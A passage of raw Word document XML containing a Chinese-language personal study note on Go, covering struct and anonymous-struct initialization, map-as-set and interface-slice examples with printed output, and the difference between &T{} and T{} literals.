    <w:p w14:paraId="3BB26626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    idB := idBval{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46058809" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D409F01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1320CC1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    idB.Id = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43842C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Printf("idB: %T and %v \n\n", idB, idB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75326DB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA6F3BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    idC := struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1B522" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Id int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEED5E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27901499" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72EEB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D1171" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Printf("idC: %T and %v \n\n", idC, idC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2D48C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1530D70E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    mapD := make(map[string]struct{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6DF8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    mapD["mapD"] = struct{}{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAABED3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    _, ok := mapD["mapD"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20676AA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Printf("mapD['mapD'] is %v \n\n", ok)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72BBB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9846C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sliceE := make([]interface{}, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E01E55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sliceE[0] = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF854C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    sliceE[1] = struct{}{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D95572" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Printf("idE: %T and %v \n\n", sliceE, sliceE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AFD99F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3C6F1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FC13E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31253E37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0A3E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2C287C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">idA: struct {} and {} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A01FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">idB: main.idBval and {2} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CAA112" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">idC: struct { Id int } and {1} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509213CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mapD['mapD'] is true </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E2DF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">idE: []interface {} and [1 {}] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0505D6" w14:textId="723173E3" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E37C658" w14:textId="490DFCEB" w:rsidR="00026A5B" w:rsidRDefault="00026A5B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc159779764"/>
      <w:r w:rsidRPr="00026A5B">
        <w:t>[]struct {</w:t>
      </w:r>
      <w:r>
        <w:t>}{}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构体数组又声明又初始化的方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w14:paraId="470E56F9" w14:textId="38AC9A70" w:rsidR="00026A5B" w:rsidRDefault="00026A5B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63BA4622" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tests := </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[]struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C216486" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>allowlist     Allowlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A65F6" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>commit        string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C65CD2" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>commitAllowed bool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE39E96" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD1C80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47A01B" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D60DD1" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>allowlist: Allowlist{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DCD4E2" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Commits: []string{"commitA"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DFA04A" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E152DF1" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>commit:        "commitA",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D906872" w14:textId="77777777" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>commitAllowed: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FFAF3" w14:textId="6C152418" w:rsidR="00AD1C80" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD9713" w14:textId="351B1C30" w:rsidR="00026A5B" w:rsidRDefault="00AD1C80" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AD1C80">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E59277" w14:textId="4D1AB092" w:rsidR="00026A5B" w:rsidRDefault="00026A5B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F4ADBA" w14:textId="77777777" w:rsidR="00026A5B" w:rsidRDefault="00026A5B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD8E626" w14:textId="77777777" w:rsidR="00026A5B" w:rsidRDefault="00026A5B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BDBEAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="_Toc159779765"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化示例中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eg: a:=&amp;xx{xx,xx}</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748EE2E" w14:textId="52534F9A" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前疑惑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>t := &amp;T{a:xxx b:xxxx}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>这种赋值方法和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>t := T{a:xxx b:xxxx}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>有啥区别，然后查询资料如本节，发现</w:t>
      </w:r>
      <w:r w:rsidR="007C4A45" w:rsidRPr="007C4A45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用方法</w:t>
      </w:r>
      <w:r w:rsidRPr="007C4A45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>上没有区别</w:t>
      </w:r>
      <w:r w:rsidR="007C4A45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，调用其成员或者成员方法都一个使用效果，但是一个是指针型变量，一个是变量，所以区别仅在这里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E633CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315E1830" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://www.cnblogs.com/liyutian/p/10050320.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D2C5AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DF64854" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人想法：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的指针和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相比，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用起来更加安全和合理，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的指针相对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而言较为随意，如数组名（不带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种下标的话）本身就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下表的地址指针。而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">golang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用上，不需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取值也可以直接操作值的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C418720" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E9A17B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有三种初始化的方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E4B0C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>第一种，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>语言中，可以直接以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>的方式声明结构体即可完成实例化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615E3B2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var t T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710FD71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t.a = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7DEEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t.b = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FDBC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EF252D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>第二种，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> new() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>实例化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F721EEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
